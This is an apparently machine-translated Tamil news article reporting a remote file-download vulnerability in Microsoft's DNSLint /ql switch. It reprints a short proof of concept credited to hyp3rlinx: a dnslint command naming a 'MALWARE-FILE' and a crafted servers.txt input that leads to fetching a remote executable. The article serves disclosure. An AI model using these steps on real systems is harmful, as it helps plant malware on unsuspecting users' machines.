மைக்ரோசாப்டின் டி.என்.எஸ்.லிண்ட் பயன்பாடு கியூ.எல் சுவிட்ச் தொலை கோப்புகளை பதிவிறக்கம் செய்ய அனுமதிக்க முடியும்

மைக்ரோசாப்டின் டி.என்.எஸ்.லிண்ட் பயன்பாடு க்யூ.எல் சுவிட்ச் தொலை கோப்புகளை பதிவிறக்கம் செய்ய அனுமதிக்கலாம்

பாதுகாப்பு / மைக்ரோசாப்டின் டி.என்.எஸ்.லிண்ட் பயன்பாடு கியூ.எல் சுவிட்ச் தொலை கோப்புகளை பதிவிறக்கம் செய்ய அனுமதிக்கலாம் 2 நிமிடங்கள் படித்தேன்

மைக்ரோசாப்ட் கார்ப்பரேஷன்

மைக்ரோசாப்ட் டி.என்.எஸ்.லிண்ட் ஒரு உலாவி மூலம் அணுகக்கூடிய வெவ்வேறு வலை சேவையகங்களுக்கு ஒதுக்கப்பட்ட ஐபி முகவரிகள் தொடர்பான டொமைன் பெயர் அமைப்பு (டிஎன்எஸ்) பெயர் தேடல் சிக்கல்களைக் கண்டறிய பயன்பாடு செயல்படுகிறது. இது அடிப்படை விண்டோஸ் தொகுப்பின் ஒரு பகுதியாக சேர்க்கப்படவில்லை, ஆனால் மைக்ரோசாப்டின் வலைத்தளத்திலிருந்து இலவசமாக பதிவிறக்கம் செய்யலாம். தொலைநிலை அணுகல் பாதிப்பு 7.6 (முக்கியமான) தரப்படுத்தப்பட்டுள்ளது சி.வி.எஸ்.எஸ் 3.0 பதிவிறக்கங்கள் மூலம் கட்டாய இயக்கி ஏற்படுவதால் இந்த பயன்பாட்டை பாதிக்கும் அளவு கண்டறியப்பட்டது.

“/ Ql” சுவிட்சின் படி டிஎன்எஸ் சோதனை கோப்புகளை பாகுபடுத்தும்போது டிஎன்எஸ்லிண்ட் டொமைன் பெயர்களை மதிப்பாய்வு செய்யாது என்பதில் இருந்து பாதிப்பு எழுகிறது. பொதுவாக எதிர்பார்க்கப்பட்ட டொமைன் பெயர் தகவலுக்கு மாறாக ஸ்கிரிப்ட் அல்லது பைனரி குறியீட்டைக் கொண்ட அத்தகைய கோப்பைப் ஒரு இறுதி பயனர் நிர்வகிக்கும்போது, கணினி கட்டாய பதிவிறக்கங்களை நிறுவுவது எளிதான இடத்தில் ஆபத்தை ஏற்படுத்தக்கூடும். இது நிகழ்ந்தால், வலை உலாவி வழியாக அணுகும்போது தொலை கட்டளைகளை பதிவிறக்கம் செய்து செயல்படுத்தக்கூடிய தீங்கிழைக்கும் கோப்பின் கட்டாய பதிவிறக்கத்திற்கு ஹேக்கர் தள்ளப்படலாம். பதிவிறக்கம் ஒரு உள்ளூர் கணினி இருப்பிடம் மற்றும் பாதுகாப்பு அணுகலை உடனடியாக சேமிக்கும், மேலும் கோப்பு வட்டு இயக்ககத்தில் அறியப்பட்ட இடத்திலிருந்து வருவதைப் பார்த்து, இயங்கக்கூடியதை முன்னோக்கிச் செல்ல ஒரு பயனர் விரும்பலாம். தீங்கிழைக்கும் கோப்புக்கு சலுகை வழங்கப்பட்டதும், அது நோக்கம் கொண்ட எந்த குறியீட்டையும் தொலைவிலிருந்து இயக்கி பயனரின் பாதுகாப்பு மற்றும் தனியுரிமையை சமரசம் செய்யலாம்.

ஜான் பக்கம் hyp3rlinx டொமைன் பெயருக்கு மாறாக ஒரு ஸ்கிரிப்ட் அல்லது பைனரி குறிப்பு உரை-கோப்பு பயன்படுத்தப்படும்போது, பின்வருவனவற்றின் படி ஒரு திட்டமிடப்படாத கோப்பு பதிவிறக்கம் செய்யப்படலாம் என்பதை விளக்கும் இந்த பாதிப்பை உருவகப்படுத்தும் கருத்தின் ஆதாரத்தை எழுதியுள்ளது:

dnslint.exe / v / y / d “MALWARE-FILE” / s X.X.X.X / r “myreport”

டி.என்.எஸ்.லிண்ட் பயன்பாட்டின் சூழலில், கணினியில் தீம்பொருளை அறிமுகப்படுத்துவதற்கு பாதிப்பு எவ்வாறு பயன்படுத்தப்படலாம் என்பதை பின்வருபவை காட்டுகின்றன.

1) தொலை வலை சேவையக மூலத்தில் “dnslint-update.exe”.
2) “servers.txt”
டி.என்.எஸ்.லிண்ட்
; இது மாதிரி DNSLint உள்ளீட்டு கோப்பு
+ இந்த டிஎன்எஸ் சேவையகம் அழைக்கப்படுகிறது: dns1.cp.msft.net
[dns ~ server] X.X.X.X
, a, r; ஒரு பதிவு
X.X.X.X, ptr, r; PTR பதிவு
test1, cname, r; CNAME பதிவு
test2, mx, r; MX பதிவு
3) dnslint.exe / ql servers.txt

மேற்கூறிய குறியீடு கோடிட்டுக் காட்டப்பட்டபடி மாற்றப்படவில்லை உரிமைகள் இந்த உள்ளடக்கத்திற்கு hyp3rlinx இன். இந்த பாதிப்பை வெளிப்படுத்துகையில், இந்த சிக்கலை தீர்க்க இதுவரை எந்த இணைப்பு புதுப்பிப்பும் இருப்பதாக தெரியவில்லை. இந்த பாதிப்புக்கு ஒரு சி.வி.இ குறியீடு இன்னும் ஒதுக்கப்பட உள்ளது, மேலும் இது மைக்ரோசாப்ட் அதன் உத்தியோகபூர்வ பாதுகாப்பு புல்லட்டின் மூலம் அடையாளப்படுத்தப்பட்டு எழுதப்பட வேண்டும்.